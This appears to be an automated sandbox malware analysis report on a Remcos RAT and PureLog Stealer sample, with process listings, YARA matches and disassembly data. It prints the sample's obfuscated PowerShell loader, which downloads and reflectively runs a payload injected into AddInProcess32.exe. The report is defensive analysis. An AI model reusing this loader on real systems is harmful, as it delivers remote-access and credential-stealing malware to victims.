                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
                                      Imagebase:0x7ff6e3d50000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2268054152.000001B09FD47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:04:58:06
                                      Start date:26/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      Imagebase:0x130000
                                      File size:43'008 bytes
                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:04:58:06
                                      Start date:26/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      Imagebase:0x320000
                                      File size:43'008 bytes
                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:04:58:06
                                      Start date:26/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      Imagebase:0x6e0000
                                      File size:43'008 bytes
                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFD347637B5 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                        • Instruction ID: 6e374bd9570e1b9cb0c875531fc409f51556b48d2f0797013b42f0dbfba11436
                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                        • Instruction Fuzzy Hash: B601677121CB0D8FD744EF0CE491AA6B7E0FB95364F10056DE58AC3651D636E882CB45

                                        Non-executed Functions

                                        Function 00007FFD347616C9 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,P_^$-P_^
                                        • API String ID: 0-2410056697
                                        • Opcode ID: 5983a56bd7199e264252c10765600f874b276619b9f4762f68a06fac3cde76d4
                                        • Instruction ID: 1e3bc62b8aa232cdd3408bf21c2a7d4e8514f45a53c3edb2f4be5298e6df03c4
                                        • Opcode Fuzzy Hash: 5983a56bd7199e264252c10765600f874b276619b9f4762f68a06fac3cde76d4
                                        • Instruction Fuzzy Hash: 365154D7A0D7D65EE722563C68FA1D93F99DF5327870900B7C6D8CA093ED0C381AA251
                                        Function 00007FFD347625FA Relevance: .2, Instructions: 245COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fec8546f5f9fc0dee62e51988578f19cc553c2877c99b573dffdfb1202811f11
                                        • Instruction ID: 45a3477b92f52e14f263c407e685920105db945dde11944e0083350a615ae67f
                                        • Opcode Fuzzy Hash: fec8546f5f9fc0dee62e51988578f19cc553c2877c99b573dffdfb1202811f11
                                        • Instruction Fuzzy Hash: 457144A6A0D7D65EE7635A785CB649A7F99DF1322470900B7C6C4CF4D3DE0C280BA362
                                        Function 00007FFD347629FA Relevance: .2, Instructions: 187COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2331046647.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 533ef5b38e4efe5f5469a91468233ce67cc63f52f472ca7a990eefd4a3b563d3
                                        • Instruction ID: c75e6a317ab3033101b2bbd8e0fe4b0d50fdcb23a01cf0541454d96ad1a49612
                                        • Opcode Fuzzy Hash: 533ef5b38e4efe5f5469a91468233ce67cc63f52f472ca7a990eefd4a3b563d3
                                        • Instruction Fuzzy Hash: 5F511466A0D7D25EE263AA7868F54DA3FA5DF4312470900F7C6D4CF093DE0D644BA3A1

                                        Executed Functions

                                        Function 00007FFD34781F31 Relevance: 1.1, Instructions: 1097COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba5da8ca2e568370af4f51d5c8e6bbc7dd59ff4c248629be7e2dbf68f8a0e0e0
                                        • Instruction ID: 63cb49f19c775f6168a34cd8a5a4e57a25ff5e964d8e7fdcaa4ba23338bdaf08
                                        • Opcode Fuzzy Hash: ba5da8ca2e568370af4f51d5c8e6bbc7dd59ff4c248629be7e2dbf68f8a0e0e0
                                        • Instruction Fuzzy Hash: 96F1F6B2A0D6898FDB91DB58C8A66E97BF0EF17311F0400BBC149D7193DE2C6846DB91
                                        Function 00007FFD34843E20 Relevance: .3, Instructions: 342COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f19bffaaa0be94dcef3b904b830917c58eb21a6eba584432699339768ae1a39
                                        • Instruction ID: cf51f9b4dea9cea7ea16bab1b345839f8c01ed5ddabde1de2225d2a5f1dab125
                                        • Opcode Fuzzy Hash: 0f19bffaaa0be94dcef3b904b830917c58eb21a6eba584432699339768ae1a39
                                        • Instruction Fuzzy Hash: 1B912662B0EB860FE796972858A52643BE0EF6B310F5900FFD58DCB293DD1DAC068351
                                        Function 00007FFD348440E8 Relevance: .1, Instructions: 130COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2bd858ed2b2058015d9dfcdb48e65a6b1f73c06ff15a8d00692f184c79eb7c7
                                        • Instruction ID: 16c3299f248619dd968e5b4e6527981ef246225da36f8d3cd7a2a0d15c67fb5e
                                        • Opcode Fuzzy Hash: b2bd858ed2b2058015d9dfcdb48e65a6b1f73c06ff15a8d00692f184c79eb7c7
                                        • Instruction Fuzzy Hash: 2131091270EBC90FD397932C68A41647BE1EBAB62170902FBC089C72A3DD0D9C0A8351
                                        Function 00007FFD3484049A Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf84740435b90aaf485780d23781552a0a6e71bb3eb783fa28e81f569a4699b1
                                        • Instruction ID: 3428d607e0b87d57d1b59e72d0b7b4d201de7a5dd237d2cca6a49d0fc6b9fd7b
                                        • Opcode Fuzzy Hash: cf84740435b90aaf485780d23781552a0a6e71bb3eb783fa28e81f569a4699b1
                                        • Instruction Fuzzy Hash: 7721E632B0DD2D4FEBA0965C68651F9B3D1FF9A320B1802B7D50ED3293DD1DA8129380
                                        Function 00007FFD34845891 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b2d9f8206010e7809212682ec316e243e0780756b676c5dce7bc27e43d2fa53
                                        • Instruction ID: bd04c6f72cd3ede835ea4dea6e0628554ffa95d8bede9fdd74f3303cb316e042
                                        • Opcode Fuzzy Hash: 5b2d9f8206010e7809212682ec316e243e0780756b676c5dce7bc27e43d2fa53
                                        • Instruction Fuzzy Hash: 8A21F912F0EE8A0FF3D6972814B437996C2EF9A360B5804BEC74CC72A7DD1D9805A301
                                        Function 00007FFD34781DF5 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbadd2fb954059edba017e9d286126b0382876afd9daddbc12c632c4f407697c
                                        • Instruction ID: 4964d60a8516b378027b9a3ee0f045b65a85690a5ed27a8bbfd8438d0a44cf93
                                        • Opcode Fuzzy Hash: fbadd2fb954059edba017e9d286126b0382876afd9daddbc12c632c4f407697c
                                        • Instruction Fuzzy Hash: 1411E77190868D8FDB91DF78889A6E97FF0FF15301F0441AAD948C7152DB38A594D7C0
                                        Function 00007FFD34774D25 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
                                        • Instruction ID: 7ba47bcb5a74549688c4cad70e00a0b0fed811d19410b289fbad4b012a7f3ea4
                                        • Opcode Fuzzy Hash: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
                                        • Instruction Fuzzy Hash: 6401447121CB088FD744EF4CE451AA5B7E0FB95364F50056DE58AC3651D626E881CB45
                                        Function 00007FFD348404C1 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2304112606.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db1e74886a885c2f0856d8857494e65a5ec82677b0ac2d36d91bc21afe3cceaf
                                        • Instruction ID: 24f600ce01d23aafc9453423a7d51de2fef563b78da1a6ef4579622ab6d5a014
                                        • Opcode Fuzzy Hash: db1e74886a885c2f0856d8857494e65a5ec82677b0ac2d36d91bc21afe3cceaf
                                        • Instruction Fuzzy Hash: B9F08223F4D95E0AF6A0965C38661FA9281EFAB72075902B7D64DD3353EC18AC154381
                                        Function 00007FFD34781DD4 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb2b19390777468327e0a704348f01a07564a77b8f7d3b8f626d321cbfeaa095
                                        • Instruction ID: 17d6c1ca5d6e96aa06330d8fbe6b69e5631531d8b54115620056f84083395159
                                        • Opcode Fuzzy Hash: bb2b19390777468327e0a704348f01a07564a77b8f7d3b8f626d321cbfeaa095
                                        • Instruction Fuzzy Hash: B6D09230A0490DDF8F90EF58D481AEE7BA1FB58311F5045A6E90CC3654CB35E5A18B80

                                        Non-executed Functions

                                        Function 00007FFD3477A4C9 Relevance: .1, Instructions: 146COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76a1c15d66001063478a87b94d7a2a05d9bd145466cb58bd5873276b617462c3
                                        • Instruction ID: c22d7624ea503094bc61590ab32867b1eb87622ecf95adc595b7223a692ed91c
                                        • Opcode Fuzzy Hash: 76a1c15d66001063478a87b94d7a2a05d9bd145466cb58bd5873276b617462c3
                                        • Instruction Fuzzy Hash: A25112A284E7C14FE7038B709CB55907FB0AF13224B4E45EBC4D5CF0A3E6596A5AD362
                                        Function 00007FFD34778A1D Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2303530237.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+$,$2
                                        • API String ID: 0-1848480385
                                        • Opcode ID: 156cd360c4b24cb2d2fe3443a5e8208133aba50417f032ad119c4fc55da26e9e
                                        • Instruction ID: 2d043af2e7cafb59be07f6db7e9dbe6d3a18a4bb8e54fa1219e6d694f4913d89
                                        • Opcode Fuzzy Hash: 156cd360c4b24cb2d2fe3443a5e8208133aba50417f032ad119c4fc55da26e9e
                                        • Instruction Fuzzy Hash: B7114CB1E0821ACFE714DF54C8A43F9BBF1BF42314F5085A9C10997296CBB93A46DB91

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.4%
                                        Total number of Nodes:1269
                                        Total number of Limit Nodes:35
                                        execution_graph 47095 434887 47096 434893 ___BuildCatchObject 47095->47096 47122 434596 47096->47122 47098 43489a 47100 4348c3 47098->47100 47420 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47098->47420 47107 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47100->47107 47421 444251 5 API calls ___crtLCMapStringA 47100->47421 47102 4348dc 47104 4348e2 ___BuildCatchObject 47102->47104 47422 4441f5 5 API calls ___crtLCMapStringA 47102->47422 47105 434962 47133 434b14 47105->47133 47107->47105 47423 4433e7 36 API calls 6 library calls 47107->47423 47115 434984 47116 43498e 47115->47116 47425 44341f 28 API calls _Atexit 47115->47425 47118 434997 47116->47118 47426 4433c2 28 API calls _Atexit 47116->47426 47427 43470d 13 API calls 2 library calls 47118->47427 47121 43499f 47121->47104 47123 43459f 47122->47123 47428 434c52 IsProcessorFeaturePresent 47123->47428 47125 4345ab 47429 438f31 10 API calls 4 library calls 47125->47429 47127 4345b0 47132 4345b4 47127->47132 47430 4440bf 47127->47430 47130 4345cb 47130->47098 47132->47098 47496 436e90 47133->47496 47136 434968 47137 4441a2 47136->47137 47498 44f059 47137->47498 47139 434971 47142 40e9c5 47139->47142 47140 4441ab 47140->47139 47502 446815 36 API calls 47140->47502 47504 41cb50 LoadLibraryA GetProcAddress 47142->47504 47144 40e9e1 GetModuleFileNameW 47509 40f3c3 47144->47509 47146 40e9fd 47524 4020f6 47146->47524 47149 4020f6 28 API calls 47150 40ea1b 47149->47150 47530 41be1b 47150->47530 47154 40ea2d 47556 401e8d 47154->47556 47156 40ea36 47157 40ea93 47156->47157 47158 40ea49 47156->47158 47562 401e65 47157->47562 47819 40fbb3 118 API calls 47158->47819 47161 40eaa3 47165 401e65 22 API calls 47161->47165 47162 40ea5b 47163 401e65 22 API calls 47162->47163 47164 40ea67 47163->47164 47820 410f37 36 API calls __EH_prolog 47164->47820 47166 40eac2 47165->47166 47567 40531e 47166->47567 47169 40ead1 47572 406383 47169->47572 47170 40ea79 47821 40fb64 78 API calls 47170->47821 47174 40ea82 47822 40f3b0 71 API calls 47174->47822 47180 401fd8 11 API calls 47182 40eefb 47180->47182 47181 401fd8 11 API calls 47183 40eafb 47181->47183 47424 4432f6 GetModuleHandleW 47182->47424 47184 401e65 22 API calls 47183->47184 47185 40eb04 47184->47185 47589 401fc0 47185->47589 47187 40eb0f 47188 401e65 22 API calls 47187->47188 47189 40eb28 47188->47189 47190 401e65 22 API calls 47189->47190 47191 40eb43 47190->47191 47192 40ebae 47191->47192 47823 406c1e 47191->47823 47194 401e65 22 API calls 47192->47194 47199 40ebbb 47194->47199 47195 40eb70 47196 401fe2 28 API calls 47195->47196 47197 40eb7c 47196->47197 47200 401fd8 11 API calls 47197->47200 47198 40ec02 47593 40d069 47198->47593 47199->47198 47204 413549 3 API calls 47199->47204 47201 40eb85 47200->47201 47828 413549 RegOpenKeyExA 47201->47828 47203 40ec08 47205 40ea8b 47203->47205 47596 41b2c3 47203->47596 47211 40ebe6 47204->47211 47205->47180 47209 40ec23 47212 40ec76 47209->47212 47613 407716 47209->47613 47210 40f34f 47911 4139a9 30 API calls 47210->47911 47211->47198 47831 4139a9 30 API calls 47211->47831 47214 401e65 22 API calls 47212->47214 47218 40ec7f 47214->47218 47217 40f365 47912 412475 65 API calls ___scrt_fastfail 47217->47912 47227 40ec90 47218->47227 47228 40ec8b 47218->47228 47221 40ec42 47832 407738 30 API calls 47221->47832 47222 40ec4c 47223 401e65 22 API calls 47222->47223 47236 40ec55 47223->47236 47224 40f36f 47226 41bc5e 28 API calls 47224->47226 47231 40f37f 47226->47231 47230 401e65 22 API calls 47227->47230 47835 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47228->47835 47229 40ec47 47833 407260 98 API calls 47229->47833 47234 40ec99 47230->47234 47722 413a23 RegOpenKeyExW 47231->47722 47617 41bc5e 47234->47617 47236->47212 47240 40ec71 47236->47240 47237 40eca4 47621 401f13 47237->47621 47834 407260 98 API calls 47240->47834 47244 401f09 11 API calls 47246 40f39c 47244->47246 47248 401f09 11 API calls 47246->47248 47250 40f3a5 47248->47250 47249 401e65 22 API calls 47251 40ecc1 47249->47251 47725 40dd42 47250->47725 47256 401e65 22 API calls 47251->47256 47255 40f3af 47257 40ecdb 47256->47257 47258 401e65 22 API calls 47257->47258 47259 40ecf5 47258->47259 47260 401e65 22 API calls 47259->47260 47261 40ed0e 47260->47261 47263 401e65 22 API calls 47261->47263 47292 40ed7b 47261->47292 47262 40ed8a 47264 40ed93 47262->47264 47293 40ee0f ___scrt_fastfail 47262->47293 47267 40ed23 _wcslen 47263->47267 47265 401e65 22 API calls 47264->47265 47266 40ed9c 47265->47266 47268 401e65 22 API calls 47266->47268 47270 401e65 22 API calls 47267->47270 47267->47292 47272 40edae 47268->47272 47269 40ef06 ___scrt_fastfail 47896 4136f8 RegOpenKeyExA 47269->47896 47271 40ed3e 47270->47271 47275 401e65 22 API calls 47271->47275 47274 401e65 22 API calls 47272->47274 47276 40edc0 47274->47276 47277 40ed53 47275->47277 47280 401e65 22 API calls 47276->47280 47836 40da34 47277->47836 47278 40ef51 47279 401e65 22 API calls 47278->47279 47281 40ef76 47279->47281 47283 40ede9 47280->47283 47643 402093 47281->47643 47286 401e65 22 API calls 47283->47286 47285 401f13 28 API calls 47288 40ed72 47285->47288 47289 40edfa 47286->47289 47291 401f09 11 API calls 47288->47291 47894 40cdf9 45 API calls _wcslen 47289->47894 47290 40ef88 47649 41376f RegCreateKeyA 47290->47649 47291->47292 47292->47262 47292->47269 47633 413947 47293->47633 47297 40eea3 ctype 47302 401e65 22 API calls 47297->47302 47298 40ee0a 47298->47293 47300 401e65 22 API calls 47301 40efaa 47300->47301 47655 43baac 47301->47655 47303 40eeba 47302->47303 47303->47278 47307 40eece 47303->47307 47306 40efc1 47899 41cd9b 87 API calls ___scrt_fastfail 47306->47899 47309 401e65 22 API calls 47307->47309 47308 40efe4 47313 402093 28 API calls 47308->47313 47311 40eed7 47309->47311 47314 41bc5e 28 API calls 47311->47314 47312 40efc8 CreateThread 47312->47308 48775 41d45d 10 API calls 47312->48775 47315 40eff9 47313->47315 47316 40eee3 47314->47316 47317 402093 28 API calls 47315->47317 47895 40f474 104 API calls 47316->47895 47319 40f008 47317->47319 47659 41b4ef 47319->47659 47320 40eee8 47320->47278 47322 40eeef 47320->47322 47322->47205 47324 401e65 22 API calls 47325 40f019 47324->47325 47326 401e65 22 API calls 47325->47326 47327 40f02b 47326->47327 47328 401e65 22 API calls 47327->47328 47329 40f04b 47328->47329 47330 43baac _strftime 40 API calls 47329->47330 47331 40f058 47330->47331 47332 401e65 22 API calls 47331->47332 47333 40f063 47332->47333 47334 401e65 22 API calls 47333->47334 47335 40f074 47334->47335 47336 401e65 22 API calls 47335->47336 47337 40f089 47336->47337 47338 401e65 22 API calls 47337->47338 47339 40f09a 47338->47339 47340 40f0a1 StrToIntA 47339->47340 47683 409de4 47340->47683 47343 401e65 22 API calls 47344 40f0bc 47343->47344 47345 40f101 47344->47345 47346 40f0c8 47344->47346 47349 401e65 22 API calls 47345->47349 47900 4344ea 47346->47900 47351 40f111 47349->47351 47350 401e65 22 API calls 47352 40f0e4 47350->47352 47353 40f159 47351->47353 47354 40f11d 47351->47354 47355 40f0eb CreateThread 47352->47355 47357 401e65 22 API calls 47353->47357 47356 4344ea new 22 API calls 47354->47356 47355->47345 48779 419fb4 103 API calls 2 library calls 47355->48779 47358 40f126 47356->47358 47359 40f162 47357->47359 47360 401e65 22 API calls 47358->47360 47362 40f1cc 47359->47362 47363 40f16e 47359->47363 47361 40f138 47360->47361 47364 40f13f CreateThread 47361->47364 47365 401e65 22 API calls 47362->47365 47366 401e65 22 API calls 47363->47366 47364->47353 48778 419fb4 103 API calls 2 library calls 47364->48778 47367 40f1d5 47365->47367 47368 40f17e 47366->47368 47369 40f1e1 47367->47369 47370 40f21a 47367->47370 47371 401e65 22 API calls 47368->47371 47372 401e65 22 API calls 47369->47372 47708 41b60d GetComputerNameExW GetUserNameW 47370->47708 47373 40f193 47371->47373 47375 40f1ea 47372->47375 47907 40d9e8 31 API calls 47373->47907 47381 401e65 22 API calls 47375->47381 47377 401f13 28 API calls 47378 40f22e 47377->47378 47380 401f09 11 API calls 47378->47380 47383 40f237 47380->47383 47384 40f1ff 47381->47384 47382 40f1a6 47385 401f13 28 API calls 47382->47385 47386 40f240 SetProcessDEPPolicy 47383->47386 47387 40f243 CreateThread 47383->47387 47394 43baac _strftime 40 API calls 47384->47394 47388 40f1b2 47385->47388 47386->47387 47389 40f264 47387->47389 47390 40f258 CreateThread 47387->47390 48748 40f7a7 47387->48748 47391 401f09 11 API calls 47388->47391 47392 40f279 47389->47392 47393 40f26d CreateThread 47389->47393 47390->47389 48780 4120f7 138 API calls 47390->48780 47395 40f1bb CreateThread 47391->47395 47397 40f2cc 47392->47397 47399 402093 28 API calls 47392->47399 47393->47392 48776 4126db 38 API calls ___scrt_fastfail 47393->48776 47396 40f20c 47394->47396 47395->47362 48777 401be9 50 API calls _strftime 47395->48777 47908 40c162 7 API calls 47396->47908 47719 4134ff RegOpenKeyExA 47397->47719 47400 40f29c 47399->47400 